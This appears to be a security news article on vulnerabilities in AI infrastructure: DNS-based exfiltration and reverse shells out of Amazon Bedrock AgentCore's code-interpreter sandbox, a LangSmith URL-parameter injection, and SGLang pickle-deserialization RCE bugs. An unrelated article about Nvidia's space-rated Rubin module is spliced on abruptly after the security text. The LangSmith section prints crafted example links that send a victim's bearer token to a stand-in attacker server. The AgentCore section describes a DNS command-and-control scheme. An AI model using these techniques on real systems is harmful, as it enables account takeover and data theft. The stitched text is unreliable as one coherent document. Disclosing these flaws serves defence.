Cybersecurity researchers have disclosed details of a new method for exfiltrating sensitive data from artificial intelligence (AI) code execution environments using domain name system (DNS) queries.

In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode permits outbound DNS queries that an attacker can exploit to enable interactive shells and bypass network isolation. The issue, which does not have a CVE identifier, carries a CVSS score of 7.5 out of 10.0.

Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to securely execute code in isolated sandbox environments, such that agentic workloads cannot access external systems. It was launched by Amazon in August 2025.

The fact that the service allows DNS queries despite “no network access” configuration can allow “threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls,” Kinnaird McQuade, chief security architect at BeyondTrust, said.

In an experimental attack scenario, a threat actor can abuse this behavior to set up a bidirectional communication channel using DNS queries and responses, obtain an interactive reverse shell, exfiltrate sensitive information through DNS queries if their IAM role has permissions to access AWS resources like S3 buckets storing that data, and perform command execution.

What’s more, the DNS communication mechanism can be abused to deliver additional payloads that are fed to the Code Interpreter, causing it to poll the DNS command-and-control (C2) server for commands stored in DNS A records, execute them, and return the results via DNS subdomain queries.

It’s worth noting that Code Interpreter requires an IAM role to access AWS resources. However, a simple oversight can cause an overprivileged role to be assigned to the service, granting it broad permissions to access sensitive data.

Following responsible disclosure in September 2025, Amazon has determined it to be intended functionality rather than a defect, urging customers to use VPC mode instead of sandbox mode for complete network isolation. The tech giant is also recommending the use of a DNS firewall to filter outbound DNS traffic.

“To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode,” Jason Soroko, senior fellow at Sectigo, said.

“Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise.”

LangSmith Susceptible to Account Takeover Flaw

The disclosure comes as Miggo Security disclosed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposed users to potential token theft and account takeover. The issue, which affects both self-hosted and cloud deployments, has been addressed in LangSmith version 0.12.71 released in December 2025.

The shortcoming has been characterized as a case of URL parameter injection stemming from a lack of validation on the baseUrl parameter, enabling an attacker to steal a signed-in user’s bearer token, user ID, and workspace ID transmitted to a server under their control through social engineering techniques like tricking the victim into clicking on a specially crafted link like below –

• Cloud – smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
• Self-hosted – <LangSmith_domain_of_the_customer>/studio/?baseUrl=https://attacker-server.com

Successful exploitation of the vulnerability could allow an attacker to gain unauthorized access to the AI’s trace history, as well as expose internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls.

“A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link,” Miggo researchers Liad Eliyahu and Eliana Vuijsje said.

“This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because, like ‘traditional’ software, AI Agents have deep access to internal data sources and third-party services.”

Unsafe Pickle Deserialization Flaws in SGLang

Security vulnerabilities have also been flagged in SGLang, a popular open-source framework for serving large language models and multimodal AI models, which, if successfully exploited, could trigger unsafe pickle deserialization, potentially resulting in remote code execution.

The vulnerabilities, discovered by Orca security researcher Igor Stepansky, remain unpatched as of writing. A brief description of the flaws is as follows –

• CVE-2026-3059 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s multimodal generation module.
• CVE-2026-3060 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’ encoder parallel disaggregation system.
• CVE-2026-3989 (CVSS score: 7.8) – The use of an insecure pickle.load() function without validation and proper deserialization in SGLang’s “replay_request_dump.py,” which can be exploited by providing a malicious pickle file.

“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network,” Stepansky said. “The third involves insecure deserialization in a crash dump replay utility.”

In a coordinated advisory, the CERT Coordination Center (CERT/CC) said SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled, and to CVE-2026-3060 when the encoder parallel disaggregation system is enabled.

“If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker, which will then deserialize it,” CERT/CC said.

Users of SGLang are recommended to restrict access to the service interfaces and ensure they are not exposed to untrusted networks. It’s also advised to implement adequate network segmentation and access controls to prevent unauthorized interaction with the ZeroMQ endpoints.

While there is no evidence that these vulnerabilities have been exploited in the wild, it’s crucial to monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations by the SGLang process, and outbound connections from the SGLang process to unexpected destinations.

gtc Space could be the final frontier for datacenters. Never mind that some analysts have described orbital bit barns as “peak insanity” – Nvidia has designed a new Vera Rubin module specifically to operate above the Earth’s atmosphere.

Nvidia CEO Jensen Huang announcedthe Space-1 Vera Rubin Module during his keynote at GTC on Monday. It’s specifically designed to cram AI into size-, weight-, and power-constrained environments, like the inside of a satellite or an orbital datacenter. 

According to Nvidia, the GPU on the designed-for-space Rubin Module is able to deliver up to 25 times the AI compute of an H100 GPU, perfect for “space-based inferencing, enabling next-generation compute for orbital datacenters, advanced geospatial intelligence processing and autonomous space operations.” 

It’s not necessarily intended for processing data for ground-based systems – one of the major concerns with the feasibility of orbital datacenters -but is meant for processing of data gathered from other orbital sensors and spacecraft. 

Talk about edge computing. 

Along with the purpose-built Rubin Module, Nvidia also pushed its IGX Thor unit as a durable edge computing system that “enables spacecraft to process sensor data locally,” and its AI dev module Jetson Orin as another space-constrained system good for orbit. Jetson Orin “enables real-time processing of vision, navigation and sensor data directly onboard spacecraft, reducing latency and optimizing bandwidth,” per Nvidia. 

Additionally, Nvidia said that its RTX Pro 6000 Blackwell Server Edition GPU is an ideal ground-based partner to orbital geospatial imaging processing systems that have typically used CPUs for computational work.

Huang spoke excitedly about deploying his company’s chips into orbit on Nvidia’s most recent earnings call, when he said that space AI would have interesting applications. The Nvidia chief also admitted that launching datacenters into orbit is a poor economic decision, at least for now.

Nonetheless, he’s banking it’s better to be ready for a boom that never comes than to miss it in case it does.

Multiple companies are betting on Earth orbit as the next generation of out-of-sight, out-of-mind places they can stick datacenters after filling up rural America and draining it of resources. Naturally, Nvidia is working with lots of them right now. 

“Aetherflux, Axiom Space, Kepler Communications, Planet, Sophia Space and Starcloud are using Nvidia accelerated computing platforms to power next-generation space missions across orbital and ground environments,” Nvidia said in a press release. It didn’t mention whether any of those firms are testing the new Rubin module, or whether any of them have actually sent one to orbit for testing yet. 

Aetherflux, at the very least, may do so soon, as the company claimed at the end of last year that it intended to launch its first datacenter satellite into orbit during the first quarter of 2027.

Of course, all of this supposes that orbital datacenters actually become something more than the setting for a William Gibson novel. 

“Companies are wasting money by pouring funds into the orbital data center ‘bubble’ because the economics do not work,” Gartner distinguished VP analyst Bill Ray said in a report published at the end of February. “This is due to the prohibitive costs of launching hardware and the immense technical challenges of cooling these orbital datacenters in the vacuum that is space.”

In other words, whether your chips are tiny and lightweight or not, they still have to deal with all the really hard challenges that space can throw at them, and all without humans on board to triage and problem-solve. 

“Product leaders face the very real possibility of underbuilt terrestrial data center capacity if this ‘bubble’ of space data center hype lasts for several years,” Ray opined.

Clearly Huang isn’t listening. “Space computing, the final frontier, has arrived,” he said on Monday. “As we deploy satellite constellations and explore deeper into space, intelligence must live wherever data is generated.” ®